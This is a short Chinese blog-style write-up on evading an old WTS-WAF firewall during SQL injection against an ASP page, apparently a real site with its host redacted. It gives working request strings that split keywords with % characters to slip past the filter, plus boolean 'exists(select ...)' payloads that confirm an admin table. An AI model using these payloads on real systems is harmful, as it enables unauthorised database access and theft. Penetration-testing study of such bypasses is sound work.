老版本WTS-WAF bypass小记

起因

挖漏洞的时候总是会遇到WAF，绕过记录

漏洞点

***view.asp?big=75&Id=1 漏洞点在Id参数

添加单引号报错

来一波老套的Id=1 and 1=1 ，出现防火墙

***view.asp?big=75&Id=1%20and%201=1

bypass

老版本WTS-WAF绕过很简单，在关键字里面加%符号即可

***view.asp?big=75&Id=1%20an%d%201=1

成功绕过

猜表

猜表名，这个地方使用burpsuite暴力跑就行，也可以手动测一些比较常规的表名，例如admin

***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)

说明存在admin表，为了证明语句没错，再测一下manager表

***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)

说明注入语句没错，manager表不存在

点到为止

参考链接

• https://blog.csdn.net/u011781521/article/details/53942183
• https://zhuanlan.zhihu.com/p/27730232
• https://www.jianshu.com/p/b2da19279f1f